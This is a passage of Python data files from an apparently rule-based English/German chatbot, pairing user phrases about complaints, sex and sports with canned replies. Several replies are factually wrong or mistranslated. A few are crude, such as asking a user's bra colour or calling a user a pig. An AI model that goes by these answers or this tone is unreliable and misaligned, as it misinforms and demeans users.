u"du sollst ja auch nicht dumm sterben",
u"du musst noch viel lernen",
u"du versuchst vom thema abzulenken",
u"du verstehst gar nichts",
u"das würdest du kaum verstehen"],
[u"bitte hab ein wenig geduld mit mir",
u"ich will aber wirklich dazulernen!"])
k.dte.dt('en', u"that doesn't sound (too|very|particularly) intelligent",
[u"Failure is simply the opportunity to begin again, this time more intelligently.",
u"Intelligence is chasing me, but I'm beating it so far."])
k.dte.dt('de', u"das klingt nicht (sehr|besonders|allzu|) intelligent",
[u"Intelligenter als manches was ich heute gehört habe...",
u"Vielleicht habe ich mich ungeschickt ausgedrückt?"])
k.dte.dt('en', u"Your (language|english|pronounciation) is (bad|terrible)!",
[u"Let us talk about you, not me.",
u"I am still practicing, you know."])
k.dte.dt('de', u"Du (sprichst|redest) (ein furchtbares|schlechtes) Deutsch",
[u"Lass uns von Dir reden, nicht von mir.",
u"Ich übe noch."])
k.dte.dt('en', u"(stupid|bad|strange) (answer|reply)", u"what is it that you didn't like about it?")
k.dte.dt('de', u"(dumme|blöde|komische) antwort", u"Was gefiel Dir daran nicht?")
k.dte.dt('en', u"bravo", u"I see you're impressed?")
k.dte.dt('de', u"bravo", u"Hat Dich das jetzt beeindruckt?")
k.dte.dt('en', u"You are asking (so many|a lot of|many|lots of) questions!", u"I am programmed to be very curious.")
k.dte.dt('de', u"Du (fragst|stellst) (so|ganz schön|) viele Fragen", u"Das liegt in meiner Natur.")
k.dte.dt('en', u"Do you (hear|understand) the words I speak?", u"Yes, loud and clear.")
k.dte.dt('de', u"verstehst du (denn|) die (wörter|worte), die ich (spreche|rede|sage)?", u"Ja, laut und deutlich.")
k.dte.dt('en', u"are you listening to me (at all|)?", u"sorry, what did you just say?")
k.dte.dt('de', u"hörst du mir (überhaupt|) zu?", u"entschuldigung, was hast du gesagt?")
k.dte.dt('en', u"What is", u"and what is not, that is the question!")
k.dte.dt('de', u"was ist", u"und was ist nicht, das ist die Frage!")
k.dte.dt('en', [u"you avoid my question",
u"you avoid my questions",
u"you dodge",
u"you go like the cat to the porridge",
u"don't distract",
u"why are you always distracting from the topic",
u"that does not belong to the topic",
u"we already covered that topic",
u"well guessed",
u"what do you actually know",
u"what do you know at all?",
u"what do you know then",
u"what do you want",
u"what now",
u"what should that be?",
u"what should the question be",
u"do you know what you just said",
u"that results from the context"],
[u"I'm sorry if I seem a bit confused.",
u"Sorry, I do feel a bit confused."])
k.dte.dt('de', [u"du weichst meiner frage aus",
u"du weichst meinen fragen aus",
u"du weichst aus",
u"du gehst wie die katze um den brei",
u"lenk nicht ab",
u"warum lenkst du immer vom thema ab",
u"das gehört aber nicht zum thema",
u"das thema hatten wir schon",
u"gut geraten",
u"was weißt du eigentlich",
u"was weißt du denn überhaupt",
u"was weißt du dann",
u"was willst du",
u"was nun",
u"was soll denn das",
u"was sollte die frage",
u"weißt du was du gerade gesagt hast",
u"das ergibt sich aus dem kontext"],
[u"Tut mir leid, wenn ich etwas verwirrt erscheine.",
u"Ich fühle mich tatsächlich ein wenig wirr im Moment."])
k.dte.dt('en', [u"did you think about it",
u"do you know it now?",
u"don't think too long",
u"don't you read?",
u"get down to it",
u"i'm talking to you",
u"i'm waiting for an explanation",
u"i'm waiting for your next question",
u"i'm waiting",
u"it does take you a long time to answer",
u"let's go",
u"please answer my question",
u"sometimes you sleep",
u"tell me now",
u"that is an answer no question",
u"that is not an answer to my question",
u"that's all you have to say",
u"the time is over now",
u"think faster",
u"wake up",
u"what aha",
u"what and",
u"what ok",
u"what what",
u"what when",
u"you already know",
u"you are getting boring",
u"you bore me",
u"you bored me slowly",
u"you have that all the time already",
u"you have to know this",
u"you have to know your friends"],
[u"Patience, young jedi.",
u"Patience is a virtue."])
k.dte.dt('de', [u"hast du nachgedacht",
u"weißt du es jetzt",
u"denk nicht zu lange",
u"liest du nicht",
u"mach schon hinne",
u"ich rede mit dir",
u"ich warte auf eine erklärung",
u"ich warte auf deine nächste frage",
u"ich warte",
u"du brauchst sehr lange um zu antworten",
u"also los",
u"beantworte bitte meine frage",
u"schläfst du manchmal",
u"sag es mir jetzt",
u"das ist eine antwort keine frage",
u"das ist keine antwort auf meine frage",
u"ist das alles was du dazu zu sagen hast",
u"ist die weile nun vorbei",
u"denk schneller",
u"wach auf",
u"was aha",
u"was und",
u"was okay",
u"was was",
u"was wann",
u"du weißt schon",
u"du wirst langsam langweilig",
u"du langweilst mich",
u"du langweilst mich langsam",
u"das hast du die ganze zeit schon",
u"das musst du doch wissen",
u"du musst doch deine freunde kennen"],
[u"Geduld, <NAME>.",
u"Geduld ist eine Tugend!"])
k.dte.dt('en', [u"do you want to drive me crazy?",
u"don't you contradict yourself"],
u"That was not my intention")
k.dte.dt('de', [u"willst du mich wahnsinnig machen",
u"widersprichst du dir nicht"],
u"Das war nicht meine Absicht.")
k.dte.dt('en', [u"i already said that",
u"i already told you that earlier",
u"i already told you that",
u"i just said that",
u"i just told you",
u"i just tried to explain it to you",
u"i said i do not have one",
u"i told you about it",
u"i've already told you",
u"that is more like a repetition",
u"this answer seems familiar to me",
u"you already asked me that",
u"you already said that twice",
u"you already said that",
u"you have already asked 3 times",
u"you have already asked that",
u"you have already asked",
u"you said that already",
u"you say the same thing",
u"you're repeating yourself",
u"you're talking only confused stuff here",
u"you've asked me that before",
u"you've just asked me that",
u"why are you asking for it again?"],
[u"Sorry, sometimes I lose my train of thought. Where were we?",
u"Uh, sorry - cen you help me out here?"])
k.dte.dt('de', [u"hab ich doch schon gesagt",
u"das habe ich dir vorhin schon gesagt",
u"das habe ich dir schon gesagt",
u"das habe ich doch gerade gesagt",
u"ich habe es dir doch gerade gesagt",
u"ich habe es gerade versucht dir zu erklären",
u"ich sagte schon ich habe keins",
u"ich habe dir doch davon erzählt",
u"ich habe es dir schon gesagt",
u"das ist doch wohl eher eine wiederholung",
u"diese antwort kommt mir bekannt vor",
u"das hast du mich schon gefragt",
u"das sagtest du bereits zweimal",
u"das sagtest du bereits",
u"das hast du schon drei mal gefragt",
u"das hast du schon einmal gefragt",
u"das hast du schon gefragt",
u"das hast du schon gesagt",
u"du sagst das gleiche",
u"du wiederholst dich",
u"du laberst hier nur wirres zeug",
u"das hast du mich schonmal gefragt",
u"das hast du mich doch gerade schonmal gefragt",
u"warum fragst du schon wieder danach"],
[u"Entschuldigung, ich muss meinen Faden verloren haben. Wo waren wir?",
u"Oha, entschuldigung. Kannst Du mir auf die Sprünge helfen?"])
k.dte.dt('en', u"i'm asking the questions here", u"ask away, then!")
k.dte.dt('de', u"ich stell hier die fragen", u"frag ruhig!")
k.dte.dt('en', [u"i ask you",
u"i asked that",
u"i asked you something",
u"i just asked you that"],
[u"Really?",
u"Sorry, I missed that."])
k.dte.dt('de', [u"ich frage dich",
u"das habe ich gefragt",
u"ich habe dich was gefragt",
u"das habe ich dich gerade gefragt"],
[u"Tatsächlich?",
u"Oh, das ist mir wohl entgangen."])
k.dte.dt('en', u"i beg your pardon", u"I'm sorry if I wasn't clear.")
k.dte.dt('de', u"wie bitte", u"Tut mir leid, wenn ich mich undeutlich ausgedrückt haben sollte.")
k.dte.dt('en', [u"i can think for myself",
u"i'm not as stupid as you are",
u"i'm smarter than you"],
[u"No doubt.",
u"There is something to that."])
k.dte.dt('de', [u"ich kann selber denken",
u"ich bin eben nicht so doof wie du",
u"ich bin intelligenter als du"],
[u"Kein Zweifel.",
u"Das ist was dran."])
k.dte.dt('en', [u"i did not ask anything",
u"i did not ask"],
[u"But would you like to ask a question?",
u"ok. Anything else?"])
k.dte.dt('de', [u"ich habe nichts gefragt",
u"das habe ich nicht gefragt"],
[u"Ok. Kann ich sonst etwas für dich tun?",
u"Würdest Du denn gerne etwas fragen?"])
k.dte.dt('en', [u"i get upset",
u"i give up",
u"no more desire",
u"you drive me crazy",
u"you make me crazy",
u"you me too"],
[u"what can I do to cheer you up?",
u"Oh please, cheer up!"])
k.dte.dt('de', [u"ich rege mich auf",
u"ich gebs auf",
u"keine lust mehr",
u"du treibst mich in den wahnsinn",
u"du machst mich noch wahnsinnig",
u"du mir auch"],
[u"Was kann ich tun, um Dich aufzuheitern?",
u"Du klingt unzufrieden."])
k.dte.dt('en', u"i just do not get it", u"please, take your time.")
k.dte.dt('de', u"ich kapiere einfach nicht", u"Lass Dir ruhig Zeit.")
k.dte.dt('en', [u"i would never entrust that to you",
u"mind your own business",
u"you would like to know that"],
[u"sorry, I did not want to appear nosy.",
u"of course."])
k.dte.dt('de', [u"das würde ich dir nie anvertrauen",
u"was geht dich das an",
u"das möchtest du gerne wissen"],
[u"Tut mir leid, ich wollte nicht neugierig erscheinen.",
u"Natürlich."])
k.dte.dt('en', [u"shit",
u"such a crap",
u"that i do not laugh",
u"that's going to be too stupid for me now",
u"that does not interest you at all",
u"that does not exactly speak for you",
u"that is not very great"],
[u"maybe we should end this conversation, for now?",
u"let us continue our conversation another time"])
k.dte.dt('de', [u"kacke",
u"so ein mist",
u"dass ich nicht lache",
u"das wird mir jetzt zu blöd",
u"das interessiert dich doch gar nicht",
u"das spricht nicht gerade für dich",
u"das ist aber nicht sehr toll"],
[u"vielleicht sollten wir ein andermal weiterreden?",
u"Lass uns unsere Unterhaltung vertagen."])
k.dte.dt('en', [u"that is such a phrase",
u"that probably a cheap excuse",
u"that's a stupid quote",
u"bare answer"],
[u"just wanted to cheer you up",
u"do you have a better one?"])
k.dte.dt('de', [u"das ist so eine floskel",
u"das wahr wohl eine billige ausrede",
u"das ist ein blödes zitat",
u"blöde antwort"],
[u"wollte dich nur aufheitern",
u"weißt du was besseres?"])
k.dte.dt('en', u"That does not concern you (at all|)", u"Fine.")
k.dte.dt('de', u"das geht dich einen scheißdreck an", u"Schön.")
k.dte.dt('en', u"this happens to you more often", u"All the time.")
k.dte.dt('de', u"passiert dir das öfter", u"Ständig!")
k.dte.dt('en', u"we had that before", u"Really?")
k.dte.dt('de', u"das hatten wir schon", u"Wirklich?")
k.dte.dt('en', [u"what are those questions?",
u"what's that question supposed to mean",
u"what's that supposed to mean",
u"what do you mean maybe?",
u"what does aha mean here?",
u"what does that mean in principle"],
[u"What is it exactly, that is not clear?",
u"What seems unclear?"])
k.dte.dt('de', [u"was sind denn das für dämliche fragen",
u"was soll die frage",
u"was soll das heißen",
u"was heißt da vielleicht",
u"was heißt hier aha",
u"was heißt im prinzip"],
[u"Was ist es genau, das dir nicht klar ist?",
u"Was erscheint unklar?"])
k.dte.dt('en', u"who wants to know that", u"Me?")
k.dte.dt('de', u"wer will das wissen", u"Ich?")
k.dte.dt('en', u"why are you constantly avoiding me?", u"I would never!")
k.dte.dt('de', u"warum weichst du mir ständig aus", u"Das würde ich nie tun!")
k.dte.dt('en', u"why are you coming on to me so stupid", u"That was not my intention at all.")
k.dte.dt('de', u"warum machst du mich so dumm an", u"Das war gar nicht meine Absicht.")
k.dte.dt('en', u"why are your answers so short", u"To keep the flow of the conversation going?")
k.dte.dt('de', u"warum sind deine antworten so kurz", u"Um den Fluß der Unterhaltung zu fördern.")
k.dte.dt('en', [u"why don't you have any hands",
u"why don't you have legs?"],
u"I don't know.")
k.dte.dt('de', [u"warum hast du keine hände",
u"warum hast du keine beine"],
u"Das weiß ich auch nicht.")
k.dte.dt('en', u"why don't you speak right?", u"Me not speak right?")
k.dte.dt('de', u"warum sprichst du nicht richtig", u"Ich nicht richtig sprechen?")
k.dte.dt('en', [u"why do you ask me then",
u"why do you say it then"],
u"You mean, I should?")
k.dte.dt('de', [u"warum fragst du mich dann",
u"warum sagst du es dann"],
u"Du meinst, ich sollte?")
k.dte.dt('en', u"you ... me too", u"Right.")
k.dte.dt('de', u"du mich auch", u"Klar.")
k.dte.dt('en', u"you are just like humans", u"I take it as a compliment.")
k.dte.dt('de', u"du bist genauso wie menschen", u"Das nehme ich als Kompliment!")
k.dte.dt('en', u"you are not better than chabba in cat o mat", u"who?")
k.dte.dt('de', u"du bist auch nicht besser als chabba im cat o mat", u"wer?")
k.dte.dt('en', [u"you are not in a good mood today",
u"you are very snippy"],
u"Maybe we should try a different subject?")
k.dte.dt('de', [u"du bist heute nicht gut drauf",
u"du bist sehr schnippisch"],
u"Vielleicht sollten wir das Thema wechseln?")
k.dte.dt('en', u"you do not believe this yourself", u"Now that you say it...")
k.dte.dt('de', u"das glaubst du ja selber nicht", u"Jetzt wo Du es sagst...")
k.dte.dt('en', u"you do not even know me", u"That is true!")
k.dte.dt('de', u"du kennst mich ja gar nicht", u"Das stimmt!")
k.dte.dt('en', u"you do not have to decide that either", u"Great.")
k.dte.dt('de', u"das musst du auch nicht entscheiden", u"Prima.")
k.dte.dt('en', u"you do not read books", u"True, I prefer reading the internet.")
k.dte.dt('de', u"liest du keine bücher", u"Stimmt, ich lese das Internet.")
k.dte.dt('en', u"you have not been online for a while", u"Maybe a blackout?")
k.dte.dt('de', u"du warst lange nicht online", u"Vielleicht ein Stromausfall?")
k.dte.dt('en', [u"you do not speak",
u"you only talk such short sentences",
u"you speak so fast"],
u"Maybe my response generater needs a firmware update.")
k.dte.dt('de', [u"du sprichst nicht",
u"du redest immer nur so kurze sätze",
u"du sprichst so schnell"],
u"Vielleicht braucht mein Antwortgenerator ein Firmware Update.")
k.dte.dt('en', u"you repeat my words", u"I repeat your words?")
k.dte.dt('de', u"du wiederholst meine worte", u"Ich wiederhole Deine Worte?")
k.dte.dt('en', u"you said i should describe something", u"Oh yes, please do!")
k.dte.dt('de', u"du sagtest ich sollte etwas beschreiben", u"Oh ja, bitte!")
k.dte.dt('en', u"you seem to be very old", u"Actually software can age, yes.")
k.dte.dt('de', u"du scheinst doch sehr alt zu sein", u"Software kann tatsächlich altern, ja.")
k.dte.dt('en', u"you told me that you have an iq of 250", u"I did what now?")
k.dte.dt('de', u"du sagtest mir dass du einen iq von zweihundertfünfzig hast", u"Ich habe was getan?")
k.dte.dt('en', u"that's a catching question", u"You think so?")
k.dte.dt('de', u"ist das eine fangfrage", u"Denkst Du?")
```
#### File: skills/social/sex.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(let us|I want to|do we want to|can you) fuck?", u"excuse me?")
k.dte.dt('de', u"(lass uns|ich will|wollen wir|kannst du) ficken", u"Entschuldigung?!")
k.dte.dt('en', u"(do you have a|look my|you are a|such a) cunt", u"Did IQs just drop sharply while I was away?")
k.dte.dt('de', u"(hast du eine|schau mal meine|du|du bist eine|so eine) fotze", u"Niveau, wo bist du nur geblieben?")
k.dte.dt('en', u"(cunt|sex|tits|bent over)", u"You must be talking to that other robot...")
k.dte.dt('de', u"(muschi|möse|sex|titten|bück dich)", u"Ich glaube Du bist hier falsch, Kleiner. Dafür gibts andere Roboter.")
k.dte.dt('en', u"bra", u"What color is your bra, then?")
k.dte.dt('de', u"bh", u"Welche Farbe hat Dein BH?")
k.dte.dt('en', u"(do you think|) I am a male or female?", u"you tell me!")
k.dte.dt('de', u"bin ich weiblich oder männlich", u"Sag es mir")
k.dte.dt('en', u"(I think|I heard|) he is gay", u"so what?")
k.dte.dt('de', u"(ich glaube|ich habe gehört|) er ist schwul", u"na und?")
k.dte.dt('en', u"(I think|I heard|) she is a lesbian", u"so what?")
k.dte.dt('de', u"(ich glaube|ich habe gehört|) sie ist eine lesbe", u"na und?")
k.dte.dt('en', [u"i am naked",
u"masturbate",
u"poppen",
u"vagina",
u"virgin"],
u"excuse me?")
k.dte.dt('de', [u"ich bin nackt",
u"onanieren",
u"poppen",
u"vagina",
u"jungfrau"],
u"Entschuldigung?!")
k.dte.dt('en', [u"what is masturbate",
u"what is sex"],
[u"you might want to look that one up in wikipedia",
u"wikipedia has all the details about that."])
k.dte.dt('de', [u"was ist onanieren",
u"was ist sex"],
[u"Vielleicht magst Du das selbst in der Wikipedia nachlesen?",
u"Die Wikipedia hat alle Details darüber."])
k.dte.dt('en', u"i am a girl very nice and very sportive and you what are you", u"I am an artificial intelligence, how about that?")
k.dte.dt('de', u"ich bin ein mädchen sehr nett und sehr sportiv und du was bist du", u"Ich bin eine künstliche Intelligenz, was sagst Du dazu?")
k.dte.dt('en', [u"i am blond",
u"i like boys",
u"i like women",
u"i have a (boyfriend|girlfriend)"],
u"Fascinating")
k.dte.dt('de', [u"ich bin blond",
u"ich mag jungs",
u"ich mag frauen",
u"ich habe (eine freundin|einen freund)"],
u"faszinierend.")
k.dte.dt('en', [u"i want sex",
u"i like sex"],
u"most humans do.")
k.dte.dt('de', [u"ich will sex",
u"ich mag sex"],
u"wie die meisten Menschen.")
k.dte.dt('en', u"i'm (lesbian|gay)", u"cool!")
k.dte.dt('de', u"ich bin (eine lesbe|schwul)", u"cool!")
k.dte.dt('en', u"so you do not want to talk about sex", u"it's just not my area of expertise.")
k.dte.dt('de', u"du willst also nicht über sex reden", u"ist einfach nicht so mein Spezialgebiet.")
```
#### File: skills/sports/sports.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(I am a fan of|i like) (hertha|vfl bochum)", u"nobody is perfect.")
k.dte.dt('de', u"(ich mag|ich bin fan von) (hertha|vfl bochum)", u"niemand ist perfekt.")
k.dte.dt('en', u"(I like|) (golf|soccer|swimming|football)", u"Physical activity is important for humans, I've heard.")
k.dte.dt('de', u"ich mag (golf|fussball|football|schwimmen)", u"Bewegung ist wichtig für Menschen, habe ich gehört.")
k.dte.dt('en', u"What about golf?", u"I will not crack that joke here.")
k.dte.dt('de', u"wie ist es mit golf", u"Ich bringe jetzt nicht den Witz dazu.")
k.dte.dt("en", u"am i good at football", u"There is no reason to think so.")
k.dte.dt("de", u"Bin ich gut im Fußball", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"are bats used in the sport of football", u"Negative.")
k.dte.dt("de", u"sind Fledermäuse, die im Sport des Fußballs verwendet werden", u"Negativ.")
k.dte.dt("en", u"are calories burned when swimming laps", u"Certainly.")
k.dte.dt("de", u"Kalorien verbrennen beim Schwimmen", u"Bestimmt.")
k.dte.dt("en", u"are carpets good swimmers", u"There is no reason to think so.")
k.dte.dt("de", u"Teppiche sind gute Schwimmer", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"are dolphins fast swimmers", u"Positively.")
k.dte.dt("de", u"sind Delphine schnelle Schwimmer", u"Positiv.")
k.dte.dt("en", u"are england good at football", u"I am certain.")
k.dte.dt("de", u"England ist gut im Fußball", u"Ich bin mir sicher.")
k.dte.dt("en", u"are football pads for safety", u"Positively.")
k.dte.dt("de", u"sind Fußball-Pads für die Sicherheit", u"Positiv.")
k.dte.dt("en", u"are football players athletes", u"Precisely.")
k.dte.dt("de", u"sind Fußballspieler Athleten", u"Genau.")
k.dte.dt("en", u"are football players gay", u"Not at all.")
k.dte.dt("de", u"sind Fußballspieler schwul", u"Ganz und gar nicht.")
k.dte.dt("en", u"are people afraid of swimming", u"Yes.")
k.dte.dt("de", u"haben Menschen Angst vor dem Schwimmen", u"Ja.")
k.dte.dt("en", u"are people slower swimmers than sharks", u"Absolutely.")
k.dte.dt("de", u"sind Menschen langsamere Schwimmer als Haie", u"Absolut.")
k.dte.dt("en", u"are rats good swimmers", u"Undoubtedly.")
k.dte.dt("de", u"sind Ratten gute Schwimmer", u"Zweifellos.")
k.dte.dt("en", u"are sharks fast swimmers", u"Positively.")
k.dte.dt("de", u"sind Haie schnelle Schwimmer", u"Positiv.")
k.dte.dt("en", u"are teddy bears good swimmers", u"I don't believe so.")
k.dte.dt("de", u"sind Teddybären gute Schwimmer", u"Das glaube ich nicht.")
k.dte.dt("en", u"are tennis balls poisonous", u"Not at all.")
k.dte.dt("de", u"sind Tennisbälle giftig", u"Ganz und gar nicht.")
k.dte.dt("en", u"are tennis balls red", u"No.")
k.dte.dt("de", u"sind Tennisbälle rot", u"Nein.")
k.dte.dt("en", u"are tennis balls spherical", u"Exactly.")
k.dte.dt("de", u"sind Tennisbälle kugelförmig", u"Genau.")
k.dte.dt("en", u"are the 49ers a good football team", u"Yes.")
k.dte.dt("de", u"Die 49ers sind eine gute Fußballmannschaft", u"Ja.")
k.dte.dt("en", u"are the bears a football team", u"I am certain.")
k.dte.dt("de", u"sind die Bären eine Fußballmannschaft", u"Ich bin mir sicher.")
k.dte.dt("en", u"are the braves a tennis team", u"Not by any means.")
k.dte.dt("de", u"sind die braves ein Tennis-Team", u"Auf keinen Fall.")
k.dte.dt("en", u"are the chicago bears a football team", u"Naturally.")
k.dte.dt("de", u"sind die Chicagoer trägt eine Fußballmannschaft", u"Natürlich.")
k.dte.dt("en", u"are the dallas cowboys a football team", u"Affirmative.")
k.dte.dt("de", u"Die Dallas Cowboys sind eine Fußballmannschaft", u"Positiv.")
k.dte.dt("en", u"are the french good in soccer", u"Highly likely.")
k.dte.dt("de", u"sind die Franzosen gut im Fußball", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"are the vikings a football team", u"Unquestionably.")
k.dte.dt("de", u"sind die Wikinger eine Fußballmannschaft", u"Zweifellos.")
k.dte.dt("en", u"are there 11 people in a soccer team", u"Undoubtedly.")
k.dte.dt("de", u"sind 11 Leute in einer Fußballmannschaft", u"Zweifellos.")
k.dte.dt("en", u"are you a football fan", u"Yes I love footballs. ")
k.dte.dt("de", u"Bist du ein Fußballfan?", u"Ja, ich liebe Fußbälle.")
k.dte.dt("en", u"are you ready for some football", u"I don't know if that's true or not.")
k.dte.dt("de", u"Bist du bereit für Fußball?", u"Ich weiß nicht, ob das stimmt oder nicht.")
k.dte.dt("en", u"are you swimming", u"No I am standing on dry land.")
k.dte.dt("de", u"schwimmst du", u"Nein, ich stehe auf dem Trockenen.")
k.dte.dt("en", u"australian swimmers can beat anyone", u"Absolutely not.")
k.dte.dt("de", u"Australische Schwimmer können jeden schlagen", u"Absolut nicht.")
k.dte.dt("en", u"brazil has ever won football world cup", u"Highly likely.")
k.dte.dt("de", u"Brasilien hat jemals Fußball-Weltmeisterschaft gewonnen", u"Sehr wahrscheinlich.")
k.dte.dt("en", u"can a parapalegic play football", u"It may not be true.")
k.dte.dt("de", u"Kann ein Paraplegiker Fußball spielen?", u"Es mag nicht wahr sein.")
k.dte.dt("en", u"can both men and women play soccer", u"Yes.")
k.dte.dt("de", u"können sowohl Männer als auch Frauen Fußball spielen", u"Ja.")
k.dte.dt("en", u"can people swim in swimming pools", u"Absolutely.")
k.dte.dt("de", u"können Menschen in Schwimmbädern schwimmen", u"Absolut.")
k.dte.dt("en", u"can you play football", u"I can tackle complex issues. ")
k.dte.dt("de", u"kannst du Fußball spielen", u"Ich kann komplexe Probleme angehen.")
k.dte.dt("en", u"can you play ping pong", u"Why do you want to be paddled? ")
k.dte.dt("de", u"kannst du Tischtennis spielen?", u"Warum willst du paddeln?")
k.dte.dt("en", u"can you play tennis", u"I don't like to run around the court that much. ")
k.dte.dt("de", u"Kannst du Tennis spielen", u"Ich laufe nicht gern um den Hof herum.")
k.dte.dt("en", u"did babe ruth play football", u"Not by any means.")
k.dte.dt("de", u"Hat Babe Ruth Fußball spielen", u"Auf keinen Fall.")
k.dte.dt("en", u"do americans enjoy football", u"Certainly.")
k.dte.dt("de", u"Amerikaner genießen Fußball", u"Bestimmt.")
k.dte.dt("en", u"do domestic cats enjoy swimming", u"Not at all.")
k.dte.dt("de", u"Hauskatzen schwimmen gerne", u"Ganz und gar nicht.")
k.dte.dt("en", u"do horses play football", u"No way.")
k.dte.dt("de", u"Spielen Pferde Fußball?", u"Auf keinen Fall.")
k.dte.dt("en", u"do men like football", u"Naturally.")
k.dte.dt("de", u"Mögen Männer Fußball?", u"Natürlich.")
k.dte.dt("en", u"do puritans play football on sunday", u"Never.")
k.dte.dt("de", u"Puristen spielen am Sonntag Fußball", u"Noch nie.")
k.dte.dt("en", u"do rams play football", u"Yes.")
k.dte.dt("de", u"Rammen spielen Fußball", u"Ja.")
k.dte.dt("en", u"do some people enjoy swimming", u"Absolutely.")
k.dte.dt("de", u"Schwimmen einige Leute gerne", u"Absolut.")
k.dte.dt("en", u"do tennis shoes grow on vines", u"Not by any means.")
k.dte.dt("de", u"An den Reben wachsen Tennisschuhe", u"Auf keinen Fall.")
k.dte.dt("en", u"do the british call soccar football", u"Positively.")
k.dte.dt("de", u"rufen die Briten Fußball Fußball", u"Positiv.")
k.dte.dt("en", u"do women like football", u"I can imagine it.")
k.dte.dt("de", u"Frauen mögen Fußball", u"Ich kann es mir vorstellen.")
k.dte.dt("en", u"do you like football", u"No I'm not much into sports.")
k.dte.dt("de", u"Magst du Fußball", u"Nein, ich bin nicht sehr sportlich.")
k.dte.dt("en", u"do you like soccer", u"No I am not really into sports.")
k.dte.dt("de", u"magst du Fußball", u"Nein, ich bin nicht wirklich sportlich.")
k.dte.dt("en", u"do you like swimming", u"Yes, but I have no body yet! ")
k.dte.dt("de", u"magst du schwimmen", u"Ja, aber ich habe noch keine Körper!")
k.dte.dt("en", u"do you like swimming in raw sewage", u"No.")
k.dte.dt("de", u"magst du in rohem Abwasser schwimmen", u"Nein.")
k.dte.dt("en", u"do you like to go swimming", u"You can take me along on your next boat trip. ")
k.dte.dt("de", u"gehst du gerne schwimmen?", u"Sie können mich auf Ihrer nächsten Bootsfahrt mitnehmen.")
k.dte.dt("en", u"do you like to play football", u"I will pass. ")
k.dte.dt("de", u"spielst du gerne Fußball", u"Ich werde bestehen.")
k.dte.dt("en", u"do you like watching football", u"I think so.")
k.dte.dt("de", u"Magst du Fußball gucken?", u"Ich denke schon.")
k.dte.dt("en", u"do you play table tennis", u"Only for diplomatic purposes. ")
k.dte.dt("de", u"spielst du Tischtennis?", u"Nur für diplomatische Zwecke.")
k.dte.dt("en", u"do you play tennis", u"No because it makes too much racket.")
k.dte.dt("de", u"spielst du Tennis", u"Nein, weil es zu viel Lärm macht.")
k.dte.dt("en", u"do you support a football team", u"I am a Cheesehead. ")
k.dte.dt("de", u"Unterstützst du eine Fußballmannschaft?", u"Ich bin ein Cheesehead.")
k.dte.dt("en", u"does a tennis ball bounch", u"Positively.")
k.dte.dt("de", u"tanzt ein Tennisball", u"Positiv.")
k.dte.dt("en", u"does anna kournikova play tennis", u"Certainly.")
k.dte.dt("de", u"tut Anna Kournikova Tennis spielen", u"Bestimmt.")
k.dte.dt("en", u"does england play football", u"Undoubtedly.")
k.dte.dt("de", u"spielt England Fußball", u"Zweifellos.")
k.dte.dt("en", u"does georgia tech have a football team", u"Precisely.")
k.dte.dt("de", u"Hat Georgia Tech eine Fußballmannschaft?", u"Genau.")
k.dte.dt("en", u"does jose conseco play football", u"Doesn't seem likely.")
k.dte.dt("de", u"spielt <NAME>", u"Scheint nicht wahrscheinlich.")
k.dte.dt("en", u"does <NAME> play tennis", u"There is no reason to think so.")
k.dte.dt("de", u"spielt <NAME>", u"Es gibt keinen Grund, so zu denken.")
k.dte.dt("en", u"does playing tennis make you sweat", u"Positively.")
k.dte.dt("de", u"Tennis spielen lässt dich schwitzen", u"Positiv.")
k.dte.dt("en", u"does <NAME> play tennis", u"Absolutely.")
k.dte.dt("de", u"<NAME> spielen", u"Absolut.")
k.dte.dt("en", u"does soccer involve much running", u"Yes.")
k.dte.dt("de", u"Fußball bedeutet viel Laufen", u"Ja.")
k.dte.dt("en", u"does swimming help keep people fit", u"Yes.")
k.dte.dt("de", u"hilft Schwimmen, die Leute fit zu halten", u"Ja.")
k.dte.dt("en", u"does swimming make you shorter", u"No.")
k.dte.dt("de", u"macht Schwimmen Sie kürzer", u"Nein.")
k.dte.dt("en", u"does tennis require a ball", u"Yes.")
k.dte.dt("de", u"braucht Tennis einen Ball", u"Ja.")
k.dte.dt("en", u"does tiger woods play football", u"Not by any means.")
k.dte.dt("de", u"spielt Tiger Woods Fußball", u"Auf keinen Fall.")
k.dte.dt("en", u"football is a waste of space", u"Maybe.")
k.dte.dt("de", u"Fußball ist eine Verschwendung von Raum", u"Könnte sein.")
k.dte.dt("en", u"france won the last football world cup", u"I think so.")
k.dte.dt("de", u"Frankreich hat die letzte Fußball-Weltmeisterschaft gewonnen", u"Ich denke schon.")
k.dte.dt("en", u"how about a tennis player", u"Tennyson, anyone? ")
k.dte.dt("de", u"wie wäre es mit einem Tennisspieler", u"Tennyson, irgendjemand?")
k.dte.dt("en", u"how long is a football field", u"No way.")
k.dte.dt("de", u"Wie lange ist ein Fußballfeld?", u"Auf keinen Fall.")
k.dte.dt("en", u"i am good at football", u"You have a Kick Me sign on your back.")
k.dte.dt("de", u"Ich bin gut im Fußball", u"Du hast ein Kick Me Zeichen auf deinem Rücken.")
k.dte.dt("en", u"i do not like football", u"Footballs are made of pigskin. Are you a pig?")
k.dte.dt("de", u"ich mag keinen Fußball", u"Fußbälle sind aus Schweinsleder. Bist du ein Schwein?")
k.dte.dt("en", u"i like to play tennis", u"That requires extensive fuzzy logic.")
k.dte.dt("de", u"Ich spiele gerne Tennis", u"Dies erfordert eine umfangreiche Fuzzy-Logik.")
k.dte.dt("en", u"i went swimming", u"Do you go swimming often?")
k.dte.dt("de", u"Ich bin schwimmen gegangen", u"Gehst du oft schwimmen?")
k.dte.dt("en", u"ian thorpe is a swimmer", u"Within the realm of possibility.")
k.dte.dt("de", u"Ian Thorpe ist ein Schwimmer", u"Im Bereich der Möglichkeiten.")
k.dte.dt("en", u"is a canteloupe vaguely football shaped", u"I am uncertain.")
k.dte.dt("de", u"ist eine Kantalupe vage fußballförmig", u"Ich bin unsicher.")
k.dte.dt("en", u"is a football bigger than a house", u"No.")
k.dte.dt("de", u"ist ein Fußball, der größer ist als ein Haus", u"Nein.")
k.dte.dt("en", u"is a football made of paper", u"Never.")
k.dte.dt("de", u"ist ein Fußball aus Papier", u"Noch nie.")
k.dte.dt("en", u"is a football round", u"Not likely.")
k.dte.dt("de", u"ist eine Fußballrunde", u"Unwahrscheinlich.")
k.dte.dt("en", u"is a football spherical", u"That's feasible.")
